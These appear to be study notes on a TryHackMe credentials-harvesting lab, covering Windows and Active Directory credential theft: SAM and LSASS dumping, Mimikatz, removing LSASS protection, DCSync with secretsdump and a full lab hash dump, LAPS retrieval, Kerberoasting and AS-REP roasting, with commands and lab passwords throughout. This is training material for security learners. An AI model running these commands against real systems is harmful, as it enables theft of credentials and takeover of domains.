Credentials Harvesting

Introduction
Overview
The room covers the fundamental techniques used by red teamers to extract and utilize credentials
within Active Directory (AD) environments. By leveraging harvested credentials, red teamers can
perform lateral movement, impersonate users, and access critical resources.

Key Concepts
1. Credential Harvesting:

Involves techniques for obtaining login credentials such as usernames and passwords.

Methods include extracting credentials from:

Clear-text files

Windows registry

Memory dumps

2. Why Harvest Credentials?

Enables lateral movement to additional systems.

Reduces detection likelihood by mimicking legitimate user activity.

Allows account creation and management to support red team goals.

Learning Objectives
1. Extracting Credentials from Local Systems:

Learn methods to extract credentials from the Security Account Manager (SAM) database.

2. Memory Dumping for Passwords:

Techniques to access Windows memory and extract:

Clear-text passwords.

Authentication tickets (e.g., Kerberos tickets).

Credentials Harvesting 1
 3. Windows Credentials Manager:

Introduction to the Credential Manager and techniques to extract stored credentials.

4. Domain Controller Credential Extraction:

Methods to obtain credentials from a Domain Controller.

5. Local Administrator Password Solution (LAPS):

Understand LAPS and how to enumerate credentials managed by this feature.

6. Introduction to AD Credential Attacks:

Overview of attacks that target AD environments for credential theft.

Credentials Harvesting
Definition
Credentials Harvesting refers to gaining unauthorized access to user and system credentials,
including usernames, passwords, hashes, and authentication tickets.

Techniques range from extracting stored credentials to network sniffing, where credentials are
captured during transmission.

Types of Credentials
Credentials can appear in multiple forms:

1. Account Details:

Usernames and passwords stored locally, cached, or in memory.

2. Hashes:

Includes NTLM hashes and other cryptographic representations of passwords.

3. Authentication Tickets:

Ticket Granting Ticket (TGT): Used in Kerberos authentication for session tickets.

Ticket Granting Server (TGS): Grants access to specific services.

4. Other Credential Data:

Private keys or any information used for authentication to systems.

Types of Credential Harvesting

1. External Credential Harvesting:

Credentials Harvesting 2
 Phishing: Deceiving users via fake login pages or malicious emails to provide credentials.

Credential Stuffing: Testing stolen credentials across multiple platforms.

Recommended Resource: TryHackMe Phishing room.

2. Internal Credential Harvesting:

Focuses on harvesting credentials within a compromised environment.

Requires an attacker to have already gained initial access to a system.

Focus of the Room

This room emphasizes internal credential harvesting techniques:

The attacker has already compromised a system within the internal network.

Techniques to extract credentials post-compromise will be discussed.

Lab Setup
To practice the concepts in this room, a preconfigured environment is provided:

Windows Server 2019 configured as a Domain Controller.

Machine IP: 10.10.6.21

Credentials:

Username: thm

Password: Passw0rd!

Credential Access
Credential access is a critical tactic where adversaries obtain legitimate user credentials to facilitate
lateral movement, impersonation, or access to additional systems. Using legitimate credentials is often
preferred over exploiting vulnerabilities. This aligns with the MITRE ATT&CK framework under
TA0006.

Common Locations and Methods for Credential Storage and Access

1. Clear-text Files
Attackers may search compromised systems for credentials stored in plaintext within local or remote
file systems.
Examples of Clear-text Files:

Credentials Harvesting 3
 Commands history: E.g., PowerShell history located
at C:\Users\USER\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Configuration files: Web apps, FTP files, etc.

Backup files and shared files/folders.

Registry entries: Use commands like:

reg query HKLM /f password /t REG_SZ /s

reg query HKCU /f password /t REG_SZ /s

Source code: Sensitive credentials or API keys often embedded here.

MITRE Technique: Unsecured Credentials: Credentials In Files (T1552.001)

2. Database Files
Applications store settings, configurations, and credentials in database files, often found locally.

Example: Extracting credentials from McAfee Endpoint database files (Refer to THM room:
Breaching AD).

3. Password Managers
Password managers store user credentials for various services and must be secured.

Examples:

Built-in password managers (e.g., Windows Credential Manager).

Third-party apps: KeePass, 1Password, LastPass.

Potential Exploits: Misconfigurations or flaws in these applications may allow attackers to access
stored credentials.

4. Memory Dump
Sensitive information often resides in memory, accessible only by users with administrator privileges.
Examples of Extractable Data:

Clear-text credentials.

Cached passwords.

Active Directory (AD) tickets.

Credentials Harvesting 4
 5. Active Directory
Active Directory (AD) contains vital information on users, groups, and computers. Misconfigurations
by administrators can expose this data.
Key Misconfigurations:

User Descriptions: Storing passwords for new employees in descriptions.

Group Policy SYSVOL: Vulnerable versions may leak encryption keys, allowing admin access
(e.g., Task 8 discussion).

NTDS Database: Contains AD credentials, a prime target.

General AD Misconfigurations: These lead to attacks like Kerberoasting and Golden Tickets
(Task 9 discussion).

6. Network Sniffing
Attackers use techniques like Man-In-the-Middle (MITM) to intercept network traffic and steal
authentication data.
Targets:

Local computers.

AD environments.

Commonly Stolen Data:

NTLM hashes.

Additional Resources
Refer to MITRE ATT&CK framework for detailed tactics and techniques: TA0006.

Task-specific examples and demonstrations are available in relevant THM rooms, such as
Breaching AD.

Local Windows Credentials

Credential Access Notes: Local User Accounts
Windows operating systems manage user accounts as either Local Accounts (stored on the local file
system) or Domain Accounts (stored centrally in Active Directory). This section focuses on extracting
credentials for Local Accounts.

Methods for Accessing Local Account Credentials

Credentials Harvesting 5
 1. Keystrokes via Keyloggers
A keylogger monitors and logs keyboard activities.

Legitimate Uses: Software development feedback, parental control.

Adversarial Uses: Capturing credentials in an active session.

Tools: Metasploit Framework (e.g., Exploiting AD - Task 5).

2. Security Account Manager (SAM)

The SAM database stores local account details (usernames and passwords) in an encrypted format.
Direct access to c:\Windows\System32\config\sam is blocked while the system is running.

Techniques to Dump the SAM Database

1. Metasploit's HashDump

Uses in-memory code injection in the LSASS.exe process to extract hashes.

Example:

meterpreter > getuid

Server username: THM\Administrator
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:98d3b784d
80d18385cea5ab3aa2a4261:::

2. Volume Shadow Copy Service (VSS)

Use wmic to create a shadow copy of the volume containing the SAM database.

Copy files from the shadow volume:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows
\system32\config\sam C:\Users\Administrator\Desktop\sam
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows
\system32\config\system C:\Users\Administrator\Desktop\syste
m

Transfer the files to an attack machine for decryption.

3. Registry Hives

Credentials Harvesting 6
 Windows Registry stores a copy of the SAM database. Use reg.exe to save the SAM and
SYSTEM files:

reg save HKLM\sam C:\Users\Administrator\Desktop\sam-reg

reg save HKLM\system C:\Users\Administrator\Desktop\system-r
eg

4. Decrypting SAM Files

Use Impacket's secretsdump.py to extract credentials locally:

python3.9 /opt/impacket/examples/secretsdump.py -sam /tmp/sa

m-reg -system /tmp/system-reg LOCAL

3. Cracking or Utilizing Extracted Hashes

Extracted NTLM hashes can be cracked using tools like Hashcat or used for pass-the-hash and
other lateral movement techniques.

Note: Active Directory account hashes require additional files (e.g., SECURITY) for decryption.

Additional Tools and Notes

Metasploit: Built-in features like hashdump .

Volume Shadow Copy: Can bypass file access restrictions.

Impacket's SecretsDump: Supports both local and remote extraction.

Hashcat: For brute-forcing and cracking hashes.

This methodology provides several avenues for accessing local account credentials, critical for lateral
movement in penetration testing and red team assessments. Let me know if you need further
elaboration on any section!
Local Security Authority Subsystem Service (LSASS).
This detailed explanation of LSASS (Local Security Authority Subsystem Service) and its role in
credential handling is essential for understanding Windows security mechanisms and attack techniques.
Here’s a concise overview of the key points:

What is LSASS?
LSASS is a core Windows process responsible for enforcing the system's security policy.

Credentials Harvesting 7
 It handles authentication, password storage, and Kerberos tickets, enabling seamless access to
network resources without repeated credential entry.

Credentials stored in LSASS make it a high-value target for attackers aiming to steal sensitive data.

Techniques for Dumping LSASS Memory

1. GUI Method:

Use Task Manager to locate and dump the lsass.exe process.

Transfer the dump file to an analysis machine to extract credentials.

2. ProcDump:

A command-line utility from the Sysinternals Suite.

Example:

procdump.exe -accepteula -ma lsass.exe c:\Tools\Mimikatz\lsa

ss_dump

3. Mimikatz:

A powerful tool for dumping and extracting credentials from LSASS memory.

Commands:

Enable memory access privileges:

privilege::debug

Dump credentials:

sekurlsa::logonpasswords

Overcoming LSASS Protection

Protected LSASS:

Introduced by Microsoft in 2012 to restrict memory access and prevent credential dumping.

Enabled by setting the RunAsPPL DWORD value in the registry to 1 .

Bypassing Protection:

Use the mimidrv.sys driver included with Mimikatz to modify kernel-level protections.

Credentials Harvesting 8
 Commands:

Load the driver:

!+

Remove LSASS protection:

!processprotect /process:lsass.exe /remove

Important Notes:
Cached credentials are only available if a user has logged in to the system.

Dumping LSASS is a known red-team technique but often flagged by AV solutions. Techniques to
bypass detection, such as encryption or obfuscation, may be necessary.

Once NTLM hashes or clear-text credentials are obtained, attackers can use techniques like Pass-
the-Hash or Pass-the-Ticket for lateral movement or privilege escalation.

Would you like assistance in summarizing this further, or should we explore specific parts in more
depth?
Windows Credential Manager
What is Windows Credential Manager?
Credential Manager is a Windows feature that securely stores credentials for:

1. Web Credentials: Stored by browsers or web applications.

2. Windows Credentials: NTLM and Kerberos authentication details for Windows services.

3. Generic Credentials: Custom application credentials (e.g., clear-text usernames and passwords).

4. Certificate-Based Credentials: Authentication based on certificates.

Credentials are stored per user and are not shared across accounts but are cached in memory, making
them exploitable.

Accessing Credential Manager

GUI Method: Accessible via Control Panel → User Accounts → Credential Manager.

Command-Line Methods:

VaultCmd: Used for enumerating credentials stored in the vault.

Credentials Harvesting 9
 vaultcmd /list

Lists available credential vaults (e.g., Web Credentials, Windows Credentials).

vaultcmd /listproperties:"Web Credentials"

Shows the number of credentials and the protection method (e.g., DPAPI).

vaultcmd /listcreds:"Web Credentials"

Provides details about stored credentials but not passwords.

Dumping Credentials

1. PowerShell Script (Get-WebCredentials.ps1):

Used to extract clear-text passwords from Credential Manager.

Example:

Import-Module C:\Tools\Get-WebCredentials.ps1
Get-WebCredentials

function Get-WebCredentials
{
<#
.SYNOPSIS
Nishang script to retrieve web credentials from Windows vault (re

.DESCRIPTION
This script can be used to retreive web credentiaks stored in Win
also needs PowerShell v3 onwards and must be run from an elevated

.EXAMPLE
PS > Get-WebCredentials

.LINK
https://github.com/samratashok/nishang
#>

Credentials Harvesting 10
 [CmdletBinding()] Param ()

#http://stackoverflow.com/questions/9221245/how-do-i-store-and-re
$ClassHolder = [Windows.Security.Credentials.PasswordVault,Window
$VaultObj = new-object Windows.Security.Credentials.PasswordVault
$VaultObj.RetrieveAll() | foreach { $_.RetrievePassword(); $_ }
}

2. RunAs Command:
The /savecred argument stores credentials in Credential Manager.

Example:

runas /savecred /user:<domain>\<user> cmd.exe

This saves the credentials, allowing future executions without re-entering the password.

3. CmdKey Command:
Lists stored credentials or details of specific credentials.

cmdkey /list

4. Mimikatz:
Extracts stored credentials from memory.

Commands:

Enable debug privileges:

privilege::debug

Dump Credential Manager data:

sekurlsa::credman

Credential Dumping Protections

Credentials Harvesting 11
 Windows uses DPAPI (Data Protection API) to encrypt stored credentials. However, tools like
Mimikatz can bypass these protections by dumping memory.

RunAs /savecred is often disabled in secure environments to limit credential abuse.

Use of PowerShell logging and monitoring can detect attempts to run scripts like Get-

WebCredentials .

Practical Use Case

Attackers leverage Credential Manager to extract credentials for lateral movement or
privilege escalation.

By dumping clear-text passwords or hashes from Credential Manager, they can authenticate against
systems and services without cracking passwords.

Would you like assistance with any specific tool or technique mentioned here?
Domain Controller
What is the NTDS File?
NTDS.DIT: A database used by the Active Directory (AD) Domain Controller. It contains all
critical AD data such as:

User and group credentials.

Schema and object relationships.

Attributes and their values.

NTDS File Structure:

1. Schema Table: Defines object types and their relationships.

2. Link Table: Stores object attributes and values.

3. Data Table: Contains actual data (e.g., user and group information).

Default Location: C:\Windows\NTDS\ntds.dit

Dumping NTDS File Locally

Requirements
To extract hashes from the NTDS database, you need:

1. NTDS.DIT File: Contains credentials.

2. SYSTEM File: Contains the Boot Key used to decrypt NTDS.

Credentials Harvesting 12
 3. SECURITY File: Stores LSA secrets.

Using Ntdsutil
1. Dump NTDS Content Locally:

The ntdsutil utility is a Windows tool used for Active Directory maintenance.

Command to extract NTDS content:

powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\t

emp' q q"

Output: The c:\temp directory contains two folders:

Active Directory: Contains the NTDS.DIT file.

Registry: Contains SYSTEM and SECURITY files.

2. Transfer Files:

Transfer NTDS.DIT , SYSTEM , and SECURITY files to an attack machine.

3. Extract Hashes Using Impacket's secretsdump.py :

python3.9 /opt/impacket/examples/secretsdump.py -security <path

_to_SECURITY> -system <path_to_SYSTEM> -ntds <path_to_NTDS.dit>
local

Output: Dumps NTLM hashes for domain users.

Dumping NTDS Remotely (With Credentials)

Requirements
Administrative Access: Credentials for a domain user with administrative or replication
permissions.

Impacket: A Python toolkit for attacking network protocols.

DC Sync Attack
The DC Sync attack exploits permissions to replicate directory information from a Domain Controller,
effectively retrieving user credentials.

1. Prerequisites:

Credentials Harvesting 13
 An account with the following permissions:

Replicating Directory Changes.

Replicating Directory Changes All.

Replicating Directory Changes in Filtered Set.

2. Using Impacket's secretsdump.py :

Command:

python3.9 /opt/impacket/examples/secretsdump.py -just-dc <do

main>/<user>@<DC_IP>

just-dc : Extracts NTDS data only.

<domain>/<user> : Authenticated domain user credentials.

Example Output:

python3 /usr/share/doc/python3-impacket/examples/secretsd
ump.py -just-dc thm@10.10.170.137
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliat
ed companies

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nth
ash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fc9b72
f354f0371219168bdb1460af32:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae9
31b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ec44ddf5ae100
b898e9edab74811430d:::
thm.red\thm:1114:aad3b435b51404eeaad3b435b51404ee:fc525c9
683e8fe067095ba2ddc971889:::
thm.red\victim:1115:aad3b435b51404eeaad3b435b51404ee:6c3d
8f78c69ff2ebc377e19e96a10207:::
thm.red\thm-local:1116:aad3b435b51404eeaad3b435b51404ee:0
77cccc23f8ab7031726a3b70c694a49:::
thm.red\admin:1118:aad3b435b51404eeaad3b435b51404ee:077cc

Credentials Harvesting 14
 cc23f8ab7031726a3b70c694a49:::
thm.red\svc-thm:1119:aad3b435b51404eeaad3b435b51404ee:585
8d47a41e40b40f294b3100bea611f:::
thm.red\bk-admin:1120:aad3b435b51404eeaad3b435b51404ee:07
7cccc23f8ab7031726a3b70c694a49:::
thm.red\test-user:1127:aad3b435b51404eeaad3b435b51404ee:5
858d47a41e40b40f294b3100bea611f:::
sshd:1128:aad3b435b51404eeaad3b435b51404ee:a78d0aa18c049d
268b742ea360849666:::
CREDS-HARVESTIN$:1008:aad3b435b51404eeaad3b435b51404ee:9a
03577be94668fe72b734b34c6c23b5:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:510e0d5515009dc29df
8e921088e82b2da0955ed41e83d4c211031b99118bf30
Administrator:aes128-cts-hmac-sha1-96:bab514a24ef3df25c18
2f5520bfc54a0
Administrator:des-cbc-md5:6d34e608f8574632
krbtgt:aes256-cts-hmac-sha1-96:24fad271ecff882bfce29d8464
d84087c58e5db4083759e69d099ecb31573ad3
krbtgt:aes128-cts-hmac-sha1-96:2feb0c1629b37163d59d4c0deb
5ce64c
krbtgt:des-cbc-md5:d92ffd4abf02b049
thm.red\thm:aes256-cts-hmac-sha1-96:2a54bb9728201d8250789
f5e793db4097630dcad82c93bcf9342cb8bf20443ca
thm.red\thm:aes128-cts-hmac-sha1-96:70179d57a210f22ad0947
26be50f703c
thm.red\thm:des-cbc-md5:794f3889e646e383
thm.red\victim:aes256-cts-hmac-sha1-96:588635fd39ef8a9a0d
d1590285712cb2899d0ba092a6e4e87133e4c522be24ac
thm.red\victim:aes128-cts-hmac-sha1-96:672064af4dd22ebf2f
0f38d86eaf0529
thm.red\victim:des-cbc-md5:457cdc673d3b0d85
thm.red\thm-local:aes256-cts-hmac-sha1-96:a7e2212b5807960
8beb08542187c9bef1419d60a0daf84052e25e35de1f04a26
thm.red\thm-local:aes128-cts-hmac-sha1-96:7c929b738f49032
8b13fb14a6cfb09cf
thm.red\thm-local:des-cbc-md5:9e3bdc4c2a6b62c4
thm.red\admin:aes256-cts-hmac-sha1-96:7441bc46b3e9c577dae
9b106d4e4dd830ec7a49e7f1df1177ab2f349d2867c6f

Credentials Harvesting 15
 thm.red\admin:aes128-cts-hmac-sha1-96:6ffd821580f6ed556aa
51468dc1325e6
thm.red\admin:des-cbc-md5:32a8a201d3080b2f
thm.red\svc-thm:aes256-cts-hmac-sha1-96:8de18b5b63fe4083e
22f09dcbaf7fa62f1d409827b94719fe2b0e12f5e5c798d
thm.red\svc-thm:aes128-cts-hmac-sha1-96:9fa57f1b464153d54
7cca1e72ad6bc8d
thm.red\svc-thm:des-cbc-md5:f8e57c49f7dc671c
thm.red\bk-admin:aes256-cts-hmac-sha1-96:48b7d6de0b3ef302
0b2af33aa43a963494d22ccbea14a0ee13b63edb1295400e
thm.red\bk-admin:aes128-cts-hmac-sha1-96:a6108bf8422e93d4
6c2aef5f3881d546
thm.red\bk-admin:des-cbc-md5:108cc2b0d3100767
thm.red\test-user:aes256-cts-hmac-sha1-96:2102b093adef0a9
ddafe0ad5252df78f05340b19dfac8af85a4b4df25f6ab660
thm.red\test-user:aes128-cts-hmac-sha1-96:dba3f53ecee2233
0b5776043cd203b64
thm.red\test-user:des-cbc-md5:aec8e3325b85316b
sshd:aes256-cts-hmac-sha1-96:07046594c869e3e8094de5caa215
39ee557b4d3249443e1f8b528c4495725242
sshd:aes128-cts-hmac-sha1-96:e228ee34b8265323725b85c6c3c7
d85f
sshd:des-cbc-md5:b58f850b4c082cc7
CREDS-HARVESTIN$:aes256-cts-hmac-sha1-96:19806fb8d4592e97
f0a6ac08f6d71d562d70d0fca68c5ab30357511df3c267a8
CREDS-HARVESTIN$:aes128-cts-hmac-sha1-96:620d033dd35ad1f3
441c611eb84ee218
CREDS-HARVESTIN$:des-cbc-md5:bf5438d60b8fdae6
[*] Cleaning up...

3. Dump NTLM Hashes Only:

If only NTLM hashes are required, use:

python3.9 /opt/impacket/examples/secretsdump.py -just-dc-ntl

m <domain>/<user>@<DC_IP>

Using Extracted Hashes

Credentials Harvesting 16
 Once hashes are obtained, they can be used for Pass-the-Hash (PtH) attacks or cracked to retrieve
plaintext passwords.

1. Pass-the-Hash:

Use tools like Mimikatz or Impacket to authenticate as a user without knowing their plaintext
password.

2. Cracking NTLM Hashes:

Use Hashcat to brute-force or dictionary-attack NTLM hashes.

Command:

hashcat -m 1000 -a 0 <path_to_hashes.txt> <path_to_wordlist>

m 1000 : Mode for NTLM hashes.

a 0 : Straight attack mode.

Summary of Tools
Tool/Command Use Case
ntdsutil Dumps NTDS.DIT locally.
secretsdump.py Extracts hashes from NTDS.DIT remotely.
hashcat Cracks NTLM hashes.

DC Sync Dumps credentials remotely via replication.

Local Administrator Password Solution (LAPS)

Enumerating and Obtaining a Local Administrator Password in an Active
Directory Environment with LAPS Enabled
In an Active Directory (AD) environment, administrators can secure and manage local administrator
passwords across computers using Local Administrator Password Solution (LAPS). This section
explains how to enumerate and extract the local administrator password if LAPS is configured and
enabled, as well as how to exploit Group Policy Preferences (GPP) when LAPS is not used.

Group Policy Preferences (GPP) Overview

Group Policy Preferences (GPP) were a feature in Windows that allowed administrators to set
policies, including local administrator passwords, across workstations. However, GPP had a major
security flaw: it stored passwords in an encrypted format in XML files within the SYSVOL folder,
which were accessible to all authenticated users.

Credentials Harvesting 17
 Encryption Method: Initially, passwords were encrypted using AES-256 encryption, which was
secure at the time.

Vulnerability: Microsoft accidentally published the private key required to decrypt these
passwords, making it easy for attackers with domain access to decrypt and retrieve the passwords.

Tools like Get-GPPPassword can be used to exploit this vulnerability by reading the SYSVOL folder
and extracting local administrator passwords stored in GPP XML files.

Local Administrator Password Solution (LAPS)

LAPS was introduced by Microsoft to replace GPP for securely managing local administrator
passwords on machines in Active Directory environments. LAPS mitigates the vulnerabilities in GPP
by securely storing passwords in Active Directory and regularly changing them.

Two Key Attributes:

ms-mcs-AdmPwd: Contains the clear-text local administrator password.

ms-mcs-AdmPwdExpirationTime: Contains the expiration time of the local administrator

password.

LAPS Workflow:

1. The LAPS client (admpwd.dll) on each machine automatically changes the local administrator
password and updates the two AD attributes ( ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime ).

2. Authorized users with the correct permissions can query Active Directory to retrieve the password.

Enumerating LAPS in an Active Directory Environment

To obtain the local administrator password from a machine with LAPS enabled, follow these steps:

1. Verify LAPS Installation

Check if LAPS is installed on the target machine by looking for the admpwd.dll file:

C:\Users\thm> dir "C:\Program Files\LAPS\CSE"

Output:

06/06/2022 01:01 PM .
06/06/2022 01:01 PM ..
05/05/2021 07:04 AM 184,232 AdmPwd.dll

The presence of AdmPwd.dll confirms that LAPS is installed on the machine.

Credentials Harvesting 18
 2. List Available LAPS Cmdlets
Check for available PowerShell cmdlets related to LAPS:

PS C:\Users\thm> Get-Command *AdmPwd*

Output:

Cmdlet Find-AdmPwdExtendedRights
Cmdlet Get-AdmPwdPassword
Cmdlet Reset-AdmPwdPassword
Cmdlet Set-AdmPwdAuditing
Cmdlet Set-AdmPwdComputerSelfPermission
Cmdlet Set-AdmPwdReadPasswordPermission
Cmdlet Set-AdmPwdResetPasswordPermission
Cmdlet Update-AdmPwdADSchema

These cmdlets are used for managing and accessing the LAPS passwords and permissions.

3. Find Extended Rights for LAPS

The Find-AdmPwdExtendedRights cmdlet is used to identify which Organizational Unit (OU) has
extended rights to access LAPS passwords:

PS C:\Users\thm> Find-AdmPwdExtendedRights -Identity THMorg

Output:

ObjectDN ExtendedRightHolders
-------- --------------------
OU=THMorg,DC=thm,DC=red {THM\THMGroupReader}

The output shows that THMGroupReader has the extended rights to access the LAPS passwords for
computers in the THMorg OU.

4. Find Members of the Group

Check the members of the THMGroupReader group to identify users who have access to LAPS
passwords:

PS C:\Users\thm> net groups "THMGroupReader"

Credentials Harvesting 19
 Output:

Group name THMGroupReader

Members
------------------------------------------------------------------
-------------
bk-admin

The bk-admin user is part of the group and has access to the LAPS passwords.

5. Find Information About a Specific User

To verify that bk-admin has appropriate access, check the user's group memberships and ensure they
have the necessary rights to access LAPS:

PS C:\Users\victim> net user test-admin

Output:

Local Group Memberships

Global Group memberships *Domain Users *Domain Admins
*THMGroupReader *Enterprise Adm
ins

Since bk-admin is a member of THMGroupReader, it can access the LAPS password.

6. Retrieve the LAPS Password

Once you have the correct user with access rights (in this case, bk-admin), use the Get-AdmPwdPassword

cmdlet to retrieve the local administrator password for a specific machine:

PS C:\> Get-AdmPwdPassword -ComputerName creds-harvestin

Output:

ComputerName DistinguishedName
Password ExpirationTimestamp
------------ -----------------
-------- -------------------

Credentials Harvesting 20
 CREDS-HARVESTIN CN=CREDS-HARVESTIN,OU=THMorg,DC=thm,DC=red
FakePassword 2/11/2338 11:05:23...

The clear-text password is returned along with its expiration timestamp.

Practical Considerations in a Real-World Environment

LAPS is Not Universal: In a real-world scenario, LAPS is usually enabled on specific machines
(like domain controllers or workstations), so you must identify the target computer and the user
with appropriate rights to access the password.

Scripts: PowerShell scripts, such as LAPSToolkit, can help automate the enumeration of LAPS-
enabled machines and users with access rights.

Summary
Group Policy Preferences (GPP): Used to manage local administrator passwords before LAPS,
but was insecure due to the exposed encryption key.

Local Administrator Password Solution (LAPS): A more secure method for managing and
storing local administrator passwords in Active Directory.

PowerShell Cmdlets: Key cmdlets like Find-AdmPwdExtendedRights and Get-AdmPwdPassword are

used to enumerate and retrieve LAPS passwords.

Access: To retrieve the LAPS password, you need the correct permissions (e.g., membership in
groups with extended rights to LAPS).

😊
Let me know if you need further details or clarification!
Other Methods
Active Directory Attacks for Credential Harvesting
In Active Directory (AD) environments, attackers use various techniques to obtain user credentials,
particularly when looking to escalate privileges or persist within a network. Some common techniques
for credential harvesting in Windows and AD environments include Kerberoasting, AS-REP
Roasting, SMB Relay Attacks, and LLMNR/NBNS Poisoning.

Let's go through each of these attack methods to understand how they work.

1. Kerberoasting
Kerberoasting is an attack that targets Service Principal Names (SPNs) in Active Directory. SPNs are
associated with services (such as IIS or MSSQL) running under specific user accounts. These SPNs are
accessible by any user in the domain, which makes it possible for attackers to request Ticket Granting

Credentials Harvesting 21
 Service (TGS) tickets for SPNs and attempt to crack the ticket offline to retrieve service account
passwords.

Steps for Kerberoasting:

1. Identify SPNs: Use tools like GetUserSPNs.py from Impacket to enumerate SPNs for user
accounts.

2. Request TGS Tickets: After identifying SPN accounts, the attacker can request a TGS ticket for a
specific SPN account.

3. Crack the TGS Ticket: The TGS ticket is encrypted using the service account's password hash,
and attackers can use Hashcat to crack the ticket offline.

Example (Enumerating SPNs):

python3 /opt/impacket/examples/GetUserSPNs.py -dc-ip 10.10.170.137

THM.red/thm

Output:

http/creds-harvestin.thm.red svc-user

Once the SPN (like svc-user ) is identified, the attacker can request the TGS ticket for that account:

python3 /opt/impacket/examples/GetUserSPNs.py -dc-ip 10.10.170.137

THM.red/thm -request-user svc-user

The attacker can then use Hashcat to crack the ticket:

hashcat -a 0 -m 13100 spn.hash /usr/share/wordlists/rockyou.txt

2. AS-REP Roasting
AS-REP Roasting is an attack that targets user accounts configured with the "Do not require Kerberos
pre-authentication" setting. When this setting is enabled, attackers can request AS-REP (Authentication
Service Response) tickets without needing a password, allowing them to capture and crack these tickets
offline.

Steps for AS-REP Roasting:

Credentials Harvesting 22
 1. Identify Accounts with No Pre-Authentication: Use the Impacket tool Get-NPUsers.py to find
users with the UF_DONT_REQUIRE_PREAUTH flag enabled.

2. Request AS-REP Tickets: For accounts with pre-authentication disabled, request the AS-REP
tickets.

3. Crack the AS-REP Tickets: Extract the hashes and use tools like Hashcat to attempt to crack the
password offline.

Example (Enumerating Users):

python3 /opt/impacket/examples/GetNPUsers.py -dc-ip 10.10.170.137

thm.red/ -usersfile /tmp/users.txt

Output:

$krb5asrep$23$victim@THM.RED:166c95418fb9dc495789fe9[REMOVED]1e8d2
ef27$6a0e13abb5c99c07

Once an AS-REP ticket is obtained for an account like victim, it can be cracked using Hashcat.

3. SMB Relay Attack

An SMB Relay Attack exploits the NTLM authentication protocol. This attack relies on capturing
NTLM authentication packets and relaying them to a target machine in a Man-in-the-Middle (MitM)
attack. The attacker can then extract NTLM hashes from the relay to authenticate as the victim user on
a different machine.

Requirements:
SMB Signing Disabled: SMB signing must be disabled for this attack to work.

NTLM Authentication: The attacker must intercept NTLM authentication requests.

Steps for SMB Relay Attack:

1. Set Up a Relay: The attacker sets up an SMB relay service, typically using Responder or
Metasploit.

2. Capture SMB Packets: The attacker captures NTLM authentication packets sent between a victim
and a target machine.

3. Relay Authentication: The attacker relays these packets to authenticate to another machine or
service.

Credentials Harvesting 23
 4. LLMNR/NBNS Poisoning
LLMNR (Link-Local Multicast Name Resolution) and NBNS (NetBIOS Name Service) are used by
machines to resolve names when DNS fails. If a machine on the network cannot resolve a name, it will
send an LLMNR or NBNS query to all devices on the local network. LLMNR/NBNS Poisoning
occurs when an attacker spoofs the response to these queries, tricking the victim into sending NTLM
authentication details to the attacker.

Steps for LLMNR/NBNS Poisoning:

1. Set Up a Poisoning Service: Tools like Responder can be used to poison LLMNR and NBNS
requests.

2. Capture NTLM Hashes: When a victim attempts to resolve a name and the attacker responds with
a fake IP address, the victim sends an NTLM authentication request containing the NTLM hash.

3. Crack the Hashes: After capturing the NTLM hashes, the attacker can attempt to crack them
offline.

Practical Example of Attacks

To understand these attacks better, it’s helpful to try them out in a controlled environment. Here's a
brief summary of how you might execute these attacks:

1. Kerberoasting:

Identify SPNs ( GetUserSPNs.py ), request TGS tickets, and crack them using Hashcat.

2. AS-REP Roasting:

Use Get-NPUsers.py to identify users without pre-authentication, then request AS-REP

tickets and crack them offline.

3. SMB Relay:

Set up an SMB relay service, capture NTLM hashes, and attempt to authenticate to other
systems in the network.

4. LLMNR/NBNS Poisoning:

Use Responder to poison LLMNR/NBNS traffic and capture NTLM hashes.

These techniques require tools such as Impacket, Hashcat, Responder, and Metasploit. They are
effective for attacking both single systems and large AD environments.

Conclusion

Credentials Harvesting 24
 Credential harvesting techniques like Kerberoasting, AS-REP Roasting, SMB Relay, and
LLMNR/NBNS Poisoning are essential for penetration testers and attackers to exploit vulnerabilities
in Windows and Active Directory networks. Understanding these attacks and practicing them in a lab
environment helps enhance both offensive and defensive cybersecurity skills.

Credentials Harvesting 25